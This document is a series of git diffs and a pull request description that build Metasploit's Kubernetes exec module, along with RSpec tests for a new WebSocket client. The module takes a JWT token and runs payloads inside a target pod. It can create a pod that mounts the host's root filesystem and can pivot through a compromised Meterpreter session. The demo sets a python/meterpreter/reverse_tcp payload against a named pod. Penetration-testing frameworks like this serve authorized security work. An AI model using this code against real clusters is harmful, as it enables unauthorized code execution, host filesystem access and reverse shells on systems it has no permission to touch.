-              'stderr' => !!options.delete('stderr'),
-              'tty' => !!options.delete('tty')
-            }),
-            'headers' => {
-              'Sec-Websocket-Protocol' => 'v4.channel.k8s.io'
-            }
-          },
-          options
-        )
-      )
-
-      websocket
-    end
-
-    def exec_pod_capture(name, namespace, command, options = {}, &block)
-      websocket = exec_pod(name, namespace, command, options)
-      return nil if websocket.nil?
-
-      result = { error: {}, stdout: '', stderr: '' }
-      websocket.wsloop do |channel_data, _data_type|
-        next if channel_data.blank?
-
-        channel = channel_data[0].ord
-        channel_data = channel_data[1..-1]
-        case channel
-        when EXEC_CHANNEL_STDOUT
-          result[:stdout] << channel_data
-          block.call(channel_data, nil) if block_given?
-        when EXEC_CHANNEL_STDERR
-          result[:stderr] << channel_data
-          block.call(nil, channel_data) if block_given?
-        when EXEC_CHANNEL_ERROR
-          result[:error] = JSON(channel_data)
-        end
-      end
-
-      result
-    end
-
-    def get_pod(pod, namespace, options = {})
-      _res, json = call_api(
-        {
-          'method' => 'GET',
-          'uri' => http_client.normalize_uri("/api/v1/namespaces/#{namespace}/pods/#{pod}")
-        },
-        options
-      )
-
-      json
-    end
-
-    def list_namespace(options = {})
-      _res, json = call_api(
-        {
-          'method' => 'GET',
-          'uri' => http_client.normalize_uri('/api/v1/namespaces')
-        },
-        options
-      )
-
-      json
-    end
-
-    def list_pods(namespace, options = {})
-      _res, json = call_api(
-        {
-          'method' => 'GET',
-          'uri' => http_client.normalize_uri("/api/v1/namespaces/#{namespace}/pods")
-        },
-        options
-      )
-
-      json
-    end
-
-    def create_pod(data, namespace, options = {})
-      res, json = call_api(
-        {
-          'method' => 'POST',
-          'uri' => http_client.normalize_uri("/api/v1/namespaces/#{namespace}/pods"),
-          'data' => JSON.pretty_generate(data)
-        },
-        options
-      )
-
-      if res.code != 201
-        raise Kubernetes::Error::UnexpectedStatusCode, res.code
-      end
-
-      json
-    end
-
-    def delete_pod(name, namespace, options = {})
-      _res, json = call_api(
-        {
-          'method' => 'DELETE',
-          'uri' => http_client.normalize_uri("/api/v1/namespaces/#{namespace}/pods/#{name}"),
-          'headers' => {}
-        },
-        options
-      )
-
-      json
-    end
-
-    private
-
-    EXEC_CHANNEL_STDIN = 0
-    EXEC_CHANNEL_STDOUT = 1
-    EXEC_CHANNEL_STDERR = 2
-    EXEC_CHANNEL_ERROR = 3
-    EXEC_CHANNEL_RESIZE = 4
-
-    attr_reader :http_client
-
-    def build_query_string(query_vars)
-      qary = []
-      query_vars.each_pair do |key, val|
-        key = key.to_s
-
-        key = Rex::Text.uri_encode(key)
-        if val.is_a? Array
-          qary += val.map { |subval| "#{key}=#{Rex::Text.uri_encode(subval.to_s)}" }
-        else
-          qary << "#{key}=#{Rex::Text.uri_encode(val.to_s)}"
-        end
-      end
-
-      qary.join('&')
-    end
-
-    # TODO: Support receiving data directly as a table?
-    # Accept: application/json;as=Table;g=meta.k8s.io;v=v1beta1
-    # https://kubernetes.io/docs/reference/using-api/api-concepts/#receiving-resources-as-tables
-    def call_api(request, options = {})
-      res = http_client.send_request_raw(request_options(request, options))
-
-      if res.nil? || res.body.empty?
-        raise Kubernetes::Error::ApiError
-      elsif res.code == 401
-        raise Kubernetes::Error::AuthenticationError
-      end
-
-      json = res.get_json_document
-      if json.nil?
-        raise Kubernetes::Error::ApiError
-      end
-
-      [res, json.deep_symbolize_keys]
-    end
-
-    def request_options(request, options = {})
-      token = options.fetch(:token, @token)
-
-      request.merge(
-        {
-          'agent' => USER_AGENT,
-          'headers' => request.fetch('headers', {}).merge(
-            {
-              'Authorization' => "Bearer #{token}"
-            }
-          )
-        }
-      )
-    end
-  end
-end
-# rubocop:enable Style/DoubleNegation
-
 class MetasploitModule < Msf::Exploit
   Rank = ManualRanking
 
@@ -265,7 +17,7 @@ class MetasploitModule < Msf::Exploit
     super(
       update_info(
         info,
-        'Name' => 'Kubernetes exec authenticated code execution',
+        'Name' => 'Kubernetes authenticated code execution',
         'Description' => %q{
           Execute a payload within a Kubernetes pod.
         },
@@ -288,7 +40,7 @@ class MetasploitModule < Msf::Exploit
         },
         'Targets' => [
           [
-            'WebSocket Stream',
+            'Interactive WebSocket',
             {
               'Arch' => ARCH_CMD,
               'Platform' => 'unix',
@@ -345,11 +97,11 @@ class MetasploitModule < Msf::Exploit
       [
         Opt::RHOSTS(nil, false),
         Opt::RPORT(nil, false),
-        Msf::OptInt.new('SESSION', [ false, 'The session to run this module on.' ]),
-        OptString.new('Token', [ false, 'The JWT token' ]),
-        OptString.new('Pod', [ true, 'The pod name to execute in' ]),
-        OptString.new('Namespace', [ false, 'The Kubernetes namespace', 'default' ]),
-        OptString.new('Shell', [true, 'The shell to use for execution', 'sh' ]),
+        Msf::OptInt.new('SESSION', [ false, 'An optional session to use for configuration' ]),
+        OptString.new('TOKEN', [ false, 'The JWT token' ]),
+        OptString.new('POD', [ true, 'The pod name to execute in' ]),
+        OptString.new('NAMESPACE', [ false, 'The Kubernetes namespace', 'default' ]),
+        OptString.new('SHELL', [true, 'The shell to use for execution', 'sh' ]),
       ]
     )
   end
@@ -508,7 +260,7 @@ class MetasploitModule < Msf::Exploit
 
     validate_configuration!
 
-    @kubernetes_client = Kubernetes::Client.new({ http_client: self, token: api_token })
+    @kubernetes_client = Msf::Exploit::Remote::HTTP::Kubernetes::Client.new({ http_client: self, token: api_token })
 
     create_pod if pod_name.blank?
 
@@ -518,7 +270,7 @@ class MetasploitModule < Msf::Exploit
       websocket = @kubernetes_client.exec_pod(pod_name, datastore['Namespace'], datastore['Shell'], 'stdin' => true)
       fail_with(Failure::Unknown, 'Failed to establish the WebSocket') if websocket.nil?
 
-      channel = Kubernetes::Client::ExecChannel.new(websocket)
+      channel = Msf::Exploit::Remote::HTTP::Kubernetes::Client::ExecChannel.new(websocket)
       handler(channel.lsock)
     when :nix_cmd
       execute_command(payload.encoded)

--- a/modules/exploits/multi/kubernetes/exec.rb
+++ b/modules/exploits/multi/kubernetes/exec.rb
@@ -27,7 +27,6 @@ class MetasploitModule < Msf::Exploit
           'Spencer McIntyre'
         ],
         'References' => [
-          # ['URL', 'https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/']
         ],
         'Notes' => {
           'SideEffects' => [
@@ -90,7 +89,7 @@ class MetasploitModule < Msf::Exploit
             }
           ]
         ],
-        'DisclosureDate' => '2000-01-01', # FIXME: find an actual disclosure date
+        'DisclosureDate' => '2021-10-01',
         'DefaultTarget' => 0,
         'Platform' => [ 'linux', 'unix' ],
         'SessionTypes' => [ 'meterpreter' ]
@@ -108,10 +107,6 @@ class MetasploitModule < Msf::Exploit
         OptString.new('SHELL', [true, 'The shell to use for execution', 'sh' ]),
       ]
     )
-  end
-
-  def check
-    # For the check command
   end
 
   def api_token
@@ -212,7 +207,7 @@ class MetasploitModule < Msf::Exploit
           {
             name: random_identifiers[:container_name],
             image: image_name,
-            command: %w[/bin/tail -f /dev/null],
+            command: ['/bin/sh', '-c', 'exec tail -f /dev/null'],
             volumeMounts: [
               {
                 mountPath: '/host_mnt',
@@ -237,7 +232,7 @@ class MetasploitModule < Msf::Exploit
       host: rhost,
       port: rport,
       data: {
-        pod: Hash[%i[name namespace uid creationTimestamp].map { |field| [field, result.dig(:metadata, field)] }]
+        pod: result[:metadata].slice(:name, :namespace, :uid, :creationTimestamp)
       },
       update: :unique_data
     )
@@ -271,9 +266,18 @@ class MetasploitModule < Msf::Exploit
     case target['Type']
     when :nix_stream
       # Setting tty => true allows the shell prompt to be seen but it also causes commands to be echoed back
-      websocket = @kubernetes_client.exec_pod(pod_name, datastore['Namespace'], datastore['Shell'], 'stdin' => true)
+      websocket = @kubernetes_client.exec_pod(
+        pod_name,
+        datastore['Namespace'],
+        datastore['Shell'],
+        'stdin' => true,
+        'stdout' => true,
+        'stderr' => true,
+        'tty' => false
+      )
       fail_with(Failure::Unknown, 'Failed to establish the WebSocket') if websocket.nil?
 
+      print_good('Successfully established the WebSocket')
       channel = Msf::Exploit::Remote::HTTP::Kubernetes::Client::ExecChannel.new(websocket)
       handler(channel.lsock)
     when :nix_cmd
@@ -300,7 +304,15 @@ class MetasploitModule < Msf::Exploit
       command = [datastore['Shell'], '-c', cmd]
     end
 
-    result = @kubernetes_client.exec_pod_capture(pod_name, datastore['Namespace'], command) do |stdout, stderr|
+    result = @kubernetes_client.exec_pod_capture(
+      pod_name,
+      datastore['Namespace'],
+      command,
+      'stdin' => false,
+      'stdout' => true,
+      'stderr' => true,
+      'tty' => false
+    ) do |stdout, stderr|
       print_line(stdout.strip) unless stdout.blank?
       print_line(stderr.strip) unless stderr.blank?
     end

--- a/modules/exploits/multi/kubernetes/exec.rb
+++ b/modules/exploits/multi/kubernetes/exec.rb
@@ -97,6 +97,7 @@ module Kubernetes
 
     def exec_pod_capture(name, namespace, command, options = {}, &block)
       websocket = exec_pod(name, namespace, command, options)
+      return nil if websocket.nil?
 
       result = { error: {}, stdout: '', stderr: '' }
       websocket.wsloop do |channel_data, _data_type|
@@ -237,23 +238,22 @@ module Kubernetes
 end
 
 class MetasploitModule < Msf::Exploit::Remote
-  Rank = NormalRanking
+  Rank = ManualRanking
 
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::CmdStager
-  include Msf::Auxiliary::CommandShell
 
   def initialize(info = {})
     super(
       update_info(
         info,
-        'Name' => 'Kubernetes exec',
+        'Name' => 'Kubernetes exec authenticated code execution',
         'Description' => %q{
           Execute a payload within a Kubernetes pod.
         },
         'License' => MSF_LICENSE,
         'Author' => [
-          'adfoster-r7',
+          'alanfoster',
           'Spencer McIntyre'
         ],
         'References' => [
@@ -322,9 +322,10 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_options(
       [
-        OptString.new('JwtToken', [ true, 'The JWT token' ]),
+        OptString.new('Token', [ true, 'The JWT token' ]),
         OptString.new('Pod', [ true, 'The pod name to execute in' ]),
-        OptString.new('Namespace', [true, 'The Kubernetes namespace', 'default' ])
+        OptString.new('Namespace', [true, 'The Kubernetes namespace', 'default' ]),
+        OptString.new('Shell', [true, 'The shell to use for execution', 'sh' ]),
       ]
     )
   end
@@ -334,12 +335,18 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    @kubernetes_client = Kubernetes::Client.new({ http_client: self, token: datastore['JwtToken'] })
+    @kubernetes_client = Kubernetes::Client.new({ http_client: self, token: datastore['Token'] })
+
+    # todo:
+    #   * add ability to create a pod, from a configurable image
+    #   * add ability to be configured through an existing session
 
     case target['Type']
     when :nix_stream
       # Setting tty => true allows the shell prompt to be seen but it also causes commands to be echoed back
-      websocket = @kubernetes_client.exec_pod(datastore['Pod'], datastore['Namespace'], 'bash', 'stdin' => true, 'tty' => true)
+      websocket = @kubernetes_client.exec_pod(datastore['Pod'], datastore['Namespace'], datastore['Shell'], 'stdin' => true)
+      fail_with(Failure::Unknown, 'Failed to establish the WebSocket') if websocket.nil?
+
       channel = Kubernetes::Client::ExecChannel.new(websocket)
       handler(channel.lsock)
     when :nix_cmd
@@ -354,15 +361,17 @@ class MetasploitModule < Msf::Exploit::Remote
   def execute_command(cmd, _opts = {})
     case target['Platform']
     when 'python'
-      command = ['sh', '-c', "exec $(which python || which python3 || which python2) -c #{Shellwords.escape(cmd)}"]
+      command = [datastore['Shell'], '-c', "exec $(which python || which python3 || which python2) -c #{Shellwords.escape(cmd)}"]
     else
-      command = ['sh', '-c', cmd]
+      command = [datastore['Shell'], '-c', cmd]
     end
 
     result = @kubernetes_client.exec_pod_capture(datastore['Pod'], datastore['Namespace'], command) do |stdout, stderr|
       print_status("STDOUT: #{stdout.strip}") unless stdout.blank?
       print_error("STDERR: #{stderr.strip}") unless stderr.blank?
     end
+
+    fail_with(Failure::Unknown, 'Failed to execute the command') if result.nil?
 
     status = result&.dig(:error, 'status')
     fail_with(Failure::Unknown, "Status: #{status || 'Unknown'}") unless status == 'Success'

--- a/modules/exploits/multi/kubernetes/exec.rb
+++ b/modules/exploits/multi/kubernetes/exec.rb
@@ -123,6 +123,18 @@ module Kubernetes
       result
     end
 
+    def get_pod(pod, namespace, options = {})
+      _res, json = call_api(
+        {
+          'method' => 'GET',
+          'uri' => http_client.normalize_uri("/api/v1/namespaces/#{namespace}/pods/#{pod}")
+        },
+        options
+      )
+
+      json
+    end
+
     def list_namespace(options = {})
       _res, json = call_api(
         {
@@ -135,7 +147,7 @@ module Kubernetes
       json
     end
 
-    def list_pod(namespace, options = {})
+    def list_pods(namespace, options = {})
       _res, json = call_api(
         {
           'method' => 'GET',
@@ -362,6 +374,10 @@ class MetasploitModule < Msf::Exploit
     @namespace || datastore['NAMESPACE']
   end
 
+  def pod_name
+    @pod_name || datastore['POD']
+  end
+
   def configure_via_session
     vprint_status("Configuring options via session #{session.sid}")
 
@@ -413,6 +429,71 @@ class MetasploitModule < Msf::Exploit
     super
   end
 
+  def create_pod
+    random_identifiers = Rex::RandomIdentifier::Generator.new({
+      first_char_set: Rex::Text::LowerAlpha,
+      char_set: Rex::Text::LowerAlpha + Rex::Text::Numerals
+    })
+
+    image_name = @kubernetes_client.list_pods(namespace).dig(:items, 0, :spec, :containers, 0, :image)
+    print_status("Using image: #{image_name}")
+
+    new_pod_definition = {
+      apiVersion: 'v1',
+      kind: 'Pod',
+      metadata: {
+        name: random_identifiers[:pod_name],
+        labels: {}
+      },
+      spec: {
+        containers: [
+          {
+            name: random_identifiers[:container_name],
+            image: image_name,
+            command: %w[/bin/tail -f /dev/null],
+            volumeMounts: [
+              {
+                mountPath: '/host_mnt',
+                name: random_identifiers[:volume_name]
+              }
+            ]
+          }
+        ],
+        volumes: [
+          {
+            name: random_identifiers[:volume_name],
+            hostPath: {
+              path: '/Users'
+            }
+          }
+        ]
+      }
+    }
+    result = @kubernetes_client.create_pod(new_pod_definition, namespace)
+    report_note(
+      type: 'kubernetes.pod',
+      host: rhost,
+      port: rport,
+      data: {
+        pod: Hash[%i[name namespace uid creationTimestamp].map { |field| [field, result.dig(:metadata, field)] }]
+      },
+      update: :unique_data
+    )
+
+    @pod_name = random_identifiers[:pod_name]
+    print_good("Pod created: #{pod_name}")
+
+    phase = nil
+    print_status('Waiting for the pod to be ready...')
+    10.times do
+      sleep 3
+      phase = @kubernetes_client.get_pod(pod_name, namespace)&.dig(:status, :phase)&.downcase
+      break unless phase == 'pending'
+    end
+
+    fail_with(Failure::TimeoutExpired, 'The pod failed to start within the expected timeframe') unless phase == 'running'
+  end
+
   def exploit
     if session
       print_status("Routing traffic through session: #{session.sid}")
@@ -423,12 +504,12 @@ class MetasploitModule < Msf::Exploit
 
     @kubernetes_client = Kubernetes::Client.new({ http_client: self, token: api_token })
 
-    # TODO: add ability to create a pod, from a configurable image
+    create_pod if pod_name.blank?
 
     case target['Type']
     when :nix_stream
       # Setting tty => true allows the shell prompt to be seen but it also causes commands to be echoed back
-      websocket = @kubernetes_client.exec_pod(datastore['Pod'], datastore['Namespace'], datastore['Shell'], 'stdin' => true)
+      websocket = @kubernetes_client.exec_pod(pod_name, datastore['Namespace'], datastore['Shell'], 'stdin' => true)
       fail_with(Failure::Unknown, 'Failed to establish the WebSocket') if websocket.nil?
 
       channel = Kubernetes::Client::ExecChannel.new(websocket)
@@ -445,6 +526,8 @@ class MetasploitModule < Msf::Exploit
     fail_with(Failure::Unreachable, e.message) if res.nil?
     fail_with(Failure::NoAccess, 'Insufficient Kubernetes access') if res.code == 401 || res.code == 403
     fail_with(Failure::Unknown, e.message)
+  else
+    report_service(host: rhost, port: rport, proto: 'tcp', name: 'kubernetes')
   end
 
   def execute_command(cmd, _opts = {})
@@ -455,7 +538,7 @@ class MetasploitModule < Msf::Exploit
       command = [datastore['Shell'], '-c', cmd]
     end
 
-    result = @kubernetes_client.exec_pod_capture(datastore['Pod'], datastore['Namespace'], command) do |stdout, stderr|
+    result = @kubernetes_client.exec_pod_capture(pod_name, datastore['Namespace'], command) do |stdout, stderr|
       print_line(stdout) unless stdout.blank?
       print_line(stderr) unless stderr.blank?
     end

--- a/modules/exploits/multi/kubernetes/exec.rb
+++ b/modules/exploits/multi/kubernetes/exec.rb
@@ -423,7 +423,13 @@ class MetasploitModule < Msf::Exploit
     end
   end
 
-  def connect_ws(opts = {})
+  def connect_ws(opts = {}, *args)
+    opts['comm'] = session
+    opts['vhost'] = rhost
+    super
+  end
+
+  def send_request_raw(opts = {}, *args)
     opts['comm'] = session
     opts['vhost'] = rhost
     super
@@ -539,8 +545,8 @@ class MetasploitModule < Msf::Exploit
     end
 
     result = @kubernetes_client.exec_pod_capture(pod_name, datastore['Namespace'], command) do |stdout, stderr|
-      print_line(stdout) unless stdout.blank?
-      print_line(stderr) unless stderr.blank?
+      print_line(stdout.strip) unless stdout.blank?
+      print_line(stderr.strip) unless stderr.blank?
     end
 
     fail_with(Failure::Unknown, 'Failed to execute the command') if result.nil?

--- a/modules/exploits/multi/kubernetes/exec.rb
+++ b/modules/exploits/multi/kubernetes/exec.rb
@@ -194,7 +194,7 @@ class MetasploitModule < Msf::Exploit
 
   def create_pod
     if datastore['PodImage'].blank?
-      image_names = @kubernetes_client.list_pods(namespace).dig(:items, 0, :spec, :containers).map { |container| container[:image] }
+      image_names = @kubernetes_client.list_pods(namespace).fetch(:items, []).flat_map { |pod| pod.dig(:spec, :containers).map { |container| container[:image] } }.uniq
       fail_with(Failure::NotFound, 'An image could not be found from which to create a pod, set the PodImage option') if image_names.empty?
     else
       image_names = [ datastore['PodImage'] ]

--- a/modules/exploits/multi/kubernetes/exec.rb
+++ b/modules/exploits/multi/kubernetes/exec.rb
@@ -102,9 +102,15 @@ class MetasploitModule < Msf::Exploit
         Opt::RPORT(nil, false),
         Msf::OptInt.new('SESSION', [ false, 'An optional session to use for configuration' ]),
         OptString.new('TOKEN', [ false, 'The JWT token' ]),
-        OptString.new('POD', [ true, 'The pod name to execute in' ]),
+        OptString.new('POD', [ false, 'The pod name to execute in' ]),
         OptString.new('NAMESPACE', [ false, 'The Kubernetes namespace', 'default' ]),
         OptString.new('SHELL', [true, 'The shell to use for execution', 'sh' ]),
+      ]
+    )
+
+    register_advanced_options(
+      [
+        OptString.new('PodImage', [ false, 'The image from which to create the pod' ])
       ]
     )
   end
@@ -187,68 +193,90 @@ class MetasploitModule < Msf::Exploit
   end
 
   def create_pod
-    random_identifiers = Rex::RandomIdentifier::Generator.new({
-      first_char_set: Rex::Text::LowerAlpha,
-      char_set: Rex::Text::LowerAlpha + Rex::Text::Numerals
-    })
-
-    image_name = @kubernetes_client.list_pods(namespace).dig(:items, 0, :spec, :containers, 0, :image)
-    print_status("Using image: #{image_name}")
-
-    new_pod_definition = {
-      apiVersion: 'v1',
-      kind: 'Pod',
-      metadata: {
-        name: random_identifiers[:pod_name],
-        labels: {}
-      },
-      spec: {
-        containers: [
-          {
-            name: random_identifiers[:container_name],
-            image: image_name,
-            command: ['/bin/sh', '-c', 'exec tail -f /dev/null'],
-            volumeMounts: [
-              {
-                mountPath: '/host_mnt',
-                name: random_identifiers[:volume_name]
-              }
-            ]
-          }
-        ],
-        volumes: [
-          {
-            name: random_identifiers[:volume_name],
-            hostPath: {
-              path: '/Users'
-            }
-          }
-        ]
-      }
-    }
-    result = @kubernetes_client.create_pod(new_pod_definition, namespace)
-    report_note(
-      type: 'kubernetes.pod',
-      host: rhost,
-      port: rport,
-      data: {
-        pod: result[:metadata].slice(:name, :namespace, :uid, :creationTimestamp)
-      },
-      update: :unique_data
-    )
-
-    @pod_name = random_identifiers[:pod_name]
-    print_good("Pod created: #{pod_name}")
-
-    phase = nil
-    print_status('Waiting for the pod to be ready...')
-    10.times do
-      sleep 3
-      phase = @kubernetes_client.get_pod(pod_name, namespace)&.dig(:status, :phase)&.downcase
-      break unless phase == 'pending'
+    if datastore['PodImage'].blank?
+      image_names = @kubernetes_client.list_pods(namespace).dig(:items, 0, :spec, :containers).map { |container| container[:image] }
+      fail_with(Failure::NotFound, 'An image could not be found from which to create a pod, set the PodImage option') if image_names.empty?
+    else
+      image_names = [ datastore['PodImage'] ]
     end
 
-    fail_with(Failure::TimeoutExpired, 'The pod failed to start within the expected timeframe') unless phase == 'running'
+    ready = false
+    image_names.each do |image_name|
+      print_status("Using image: #{image_name}")
+
+      random_identifiers = Rex::RandomIdentifier::Generator.new({
+        first_char_set: Rex::Text::LowerAlpha,
+        char_set: Rex::Text::LowerAlpha + Rex::Text::Numerals
+      })
+      new_pod_definition = {
+        apiVersion: 'v1',
+        kind: 'Pod',
+        metadata: {
+          name: random_identifiers[:pod_name],
+          labels: {}
+        },
+        spec: {
+          containers: [
+            {
+              name: random_identifiers[:container_name],
+              image: image_name,
+              command: ['/bin/sh', '-c', 'exec tail -f /dev/null'],
+              volumeMounts: [
+                {
+                  mountPath: '/host_mnt',
+                  name: random_identifiers[:volume_name]
+                }
+              ]
+            }
+          ],
+          volumes: [
+            {
+              name: random_identifiers[:volume_name],
+              hostPath: {
+                path: '/'
+              }
+            }
+          ]
+        }
+      }
+      new_metadata = @kubernetes_client.create_pod(new_pod_definition, namespace)[:metadata]
+
+      @pod_name = random_identifiers[:pod_name]
+      print_good("Pod created: #{pod_name}")
+
+      print_status('Waiting for the pod to be ready...')
+      10.times do
+        sleep 3
+        pod = @kubernetes_client.get_pod(pod_name, namespace)
+        ready = pod.dig(:status, :containerStatuses).find { |status| status[:name] = @pod_name }[:ready]
+        break if ready
+      end
+
+      if ready
+        report_note(
+          type: 'kubernetes.pod',
+          host: rhost,
+          port: rport,
+          data: {
+            pod: new_metadata.slice(:name, :namespace, :uid, :creationTimestamp),
+            imageName: image_name
+          },
+          update: :unique_data
+        )
+
+        break
+      end
+
+      print_error('The pod failed to start within the expected timeframe')
+
+      begin
+        @kubernetes_client.delete_pod(@pod_name, namespace)
+      rescue StandardError
+        print_error('Failed to delete the pod')
+      end
+    end
+
+    fail_with(Failure::Unknown, 'Failed to create a new pod') unless ready
   end
 
   def exploit
@@ -275,7 +303,6 @@ class MetasploitModule < Msf::Exploit
         'stderr' => true,
         'tty' => false
       )
-      fail_with(Failure::Unknown, 'Failed to establish the WebSocket') if websocket.nil?
 
       print_good('Successfully established the WebSocket')
       channel = Msf::Exploit::Remote::HTTP::Kubernetes::Client::ExecChannel.new(websocket)

--- a/spec/lib/rex/proto/http/web_socket/frame_spec.rb
+++ b/spec/lib/rex/proto/http/web_socket/frame_spec.rb
@@ -1,0 +1,139 @@
+RSpec.describe Rex::Proto::Http::WebSocket::Frame do
+  subject(:frame) { Rex::Proto::Http::WebSocket::Frame.new }
+
+  it { is_expected.to respond_to :opcode }
+  it { is_expected.to respond_to :masked }
+  it { is_expected.to respond_to :payload_data }
+  it { is_expected.to respond_to :payload_len }
+
+  describe '#apply_masking_key' do
+    it 'returns an empty string when given an empty string' do
+      expect(described_class.apply_masking_key('', rand(1..0xffffffff))).to eq ''
+    end
+
+    it 'properly applies the XOR algorithm as described by the RFC' do
+      # example taken from https://datatracker.ietf.org/doc/html/rfc6455#section-5.7
+      masking_key = [ 0x37, 0xfa, 0x21, 0x3d ].pack('C*').unpack1('N')
+      ciphertext = [ 0x7f, 0x9f, 0x4d, 0x51, 0x58 ].pack('C*')
+      expect(described_class.apply_masking_key(ciphertext, masking_key)).to eq 'Hello'
+    end
+  end
+
+  describe '#initialize' do
+    it 'should set the fin flag by default' do
+      expect(described_class.new.fin).to eq 1
+    end
+  end
+
+  describe '#from_binary' do
+    let(:payload) { Random.new.bytes(rand(10..20)) }
+    let(:binary_frame) { described_class.from_binary(payload) }
+
+    it 'has the correct opcode' do
+      expect(binary_frame.opcode).to eq Rex::Proto::Http::WebSocket::Opcode::BINARY
+    end
+
+    it 'has the correct payload' do
+      expect(binary_frame.payload_len).to eq payload.length
+      expect(binary_frame.payload_data).to eq described_class.apply_masking_key(payload, binary_frame.masking_key)
+    end
+
+    it 'is the last fragment frame' do
+      expect(binary_frame.fin).to eq 1
+    end
+  end
+
+  describe '#from_text' do
+    let(:payload) { Faker::Alphanumeric.alpha(number: rand(10..20)) }
+    let(:text_frame) { described_class.from_text(payload) }
+
+    it 'has the correct opcode' do
+      expect(text_frame.opcode).to eq Rex::Proto::Http::WebSocket::Opcode::TEXT
+    end
+
+    it 'has the correct payload' do
+      expect(text_frame.payload_len).to eq payload.length
+      expect(text_frame.payload_data).to eq described_class.apply_masking_key(payload, text_frame.masking_key)
+    end
+
+    it 'is the last fragment frame' do
+      expect(text_frame.fin).to eq 1
+    end
+  end
+
+  describe '#mask!' do
+    let(:plaintext) { Faker::Alphanumeric.alpha(number: rand(10..20)) }
+
+    before(:each) do
+      frame.masked = 0
+      frame.payload_data = plaintext
+    end
+
+    it 'should return the masked payload' do
+      retval = frame.mask!
+      expect(retval).to be_a String
+      expect(retval).to_not eq plaintext
+      expect(retval.length).to eq plaintext.length
+    end
+
+    it 'should accept an explicit masking key' do
+      retval = frame.mask!(0)
+      expect(retval).to be_a String
+      expect(retval).to eq plaintext
+    end
+
+    context 'after called' do
+      before(:each) do
+        frame.masked = 0
+        frame.payload_data = plaintext
+        frame.mask!
+      end
+
+      it 'the masking key should be set' do
+        expect(frame.masking_key.value).to be_a Integer
+      end
+
+      it 'the masked bit should be set' do
+        expect(frame.masked).to eq 1
+      end
+
+      it 'the payload should be different' do
+        expect(frame.payload_data).to_not eq plaintext
+      end
+    end
+  end
+
+  describe '#unmask!' do
+    let(:masking_key) { rand(1..0xffffffff) }
+    let(:plaintext) { Faker::Alphanumeric.alpha(number: rand(10..20)) }
+    let(:ciphertext) { described_class.apply_masking_key(plaintext, masking_key) }
+
+    before(:each) do
+      frame.masked = 1
+      frame.masking_key = masking_key
+      frame.payload_data = ciphertext
+    end
+
+    it 'should return the unmasked payload' do
+      retval = frame.unmask!
+      expect(retval).to eq plaintext
+    end
+
+    context 'after called' do
+      before(:each) do
+        frame.masked = 1
+        frame.masking_key = masking_key
+        frame.payload_data = ciphertext
+        frame.unmask!
+      end
+
+      it 'the masked bit should be clear' do
+        expect(frame.masked).to eq 0
+      end
+
+      it 'the payload should be different' do
+        expect(frame.payload_data).to eq plaintext
+      end
+    end
+  end
+end

--- a/spec/lib/rex/proto/http/web_socket/opcode_spec.rb
+++ b/spec/lib/rex/proto/http/web_socket/opcode_spec.rb
@@ -1,0 +1,11 @@
+RSpec.describe Rex::Proto::Http::WebSocket::Opcode do
+  subject(:opcode) { Rex::Proto::Http::WebSocket::Opcode }
+
+  it { is_expected.to respond_to :to_sym }
+
+  describe '#to_sym' do
+    it 'converts to a symbol name' do
+      expect(opcode.to_sym).to be_a Symbol
+    end
+  end
+end

--- a/spec/lib/rex/proto/http/web_socket/opcode_spec.rb
+++ b/spec/lib/rex/proto/http/web_socket/opcode_spec.rb
@@ -1,7 +1,26 @@
 RSpec.describe Rex::Proto::Http::WebSocket::Opcode do
-  subject(:opcode) { Rex::Proto::Http::WebSocket::Opcode }
+  subject(:opcode) { Rex::Proto::Http::WebSocket::Opcode.new }
+  let(:invalid_value) { 15 }
 
   it { is_expected.to respond_to :to_sym }
+
+  describe '#initialize' do
+    it 'fails when the opcode is invalid' do
+      expect { described_class.new(invalid_value) }.to raise_error(BinData::ValidityError)
+    end
+  end
+
+  describe '#name' do
+    it 'looks up an opcode\'s name' do
+      name = described_class.name(opcode.value)
+      expect(name).to be_a Symbol
+      expect(name).to eq opcode.to_sym
+    end
+
+    it 'returns nil for invalid opcodes' do
+      expect(described_class.name(invalid_value)).to be_nil
+    end
+  end
 
   describe '#to_sym' do
     it 'converts to a symbol name' do


### PR DESCRIPTION
This adds a module to obtain authenticated code execution within a Kubernetes pod. The user must have a Kubernetes JWT token, and access to the Kubernetes REST API through some means (either direct or through a compromised pod). A session on an existing pod can be used to configure a few options, including the JWT token and RHOST / RPORT options. Some changes were made to the RHOSTS and SESSION validation code to honor instances in which they are marked as optional. When defined, the validation still takes place either way, but when they are marked as optional and blank the validation is skipped to allow the module to run.

When pivoting over a session, connections can timeout occassionally. There's an `HttpClientTimeout` datastore option that can be increased to adjust this, or just retry the module.

## WebSockets
This includes a new WebSocket implementation built on top of the existing `Rex::Proto::Http` client code. It includes a frame definition, convenient functions for sending and receiving raw frames, a dispatch loop and a channel wrapper for direct read / write operations. The dispatch loop will handle ping requests, unmasking requests, fragmentation of received data, and close requests. It allows the API consumer to just deal with the data frames.

The WebSocket can be used to obtain an interactive shell session without delivering a Metasploit payload.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use exploit/multi/kubernetes/exec`
- [ ] Test the module with explicit options (for scenarios where direct access to the Kubernetes REST API is available)
- [ ] Test the module pivoted over a Meterpreter session (for scenarios where an existing Pod is compromised)
- [ ] Test the creation of a Pod works (leave the `POD` datastore option blank, watch it be created automatically 🪄 )
    - [ ] See the created pod's information is in the database (if it's connected)
- [ ] Test the Interactive WebSocket target, get a session
- [ ] Test the Unix Command target, see output from the command
- [ ] Test the Python target, get a session is Python is installed otherwise install it first


## Demo

In this scenario, Metasploit has direct access to the Kubernetes API. A known token is used to execute a Python payload
within the `thinkphp-67f7c88cc9-tgpfh` pod.

```
msf6 > use exploit/multi/kubernetes/exec 
[*] Using configured payload python/meterpreter/reverse_tcp
msf6 exploit(multi/kubernetes/exec) > set TOKEN eyJhbGciOiJSUzI1...
TOKEN => eyJhbGciOiJSUzI1...
msf6 exploit(multi/kubernetes/exec) > set POD thinkphp-67f7c88cc9-tgpfh
POD => thinkphp-67f7c88cc9-tgpfh
msf6 exploit(multi/kubernetes/exec) > set RHOSTS 192.168.159.31
RHOSTS => 192.168.159.31
msf6 exploit(multi/kubernetes/exec) > set TARGET Python 
TARGET => Python
msf6 exploit(multi/kubernetes/exec) > set PAYLOAD python/meterpreter/reverse_tcp
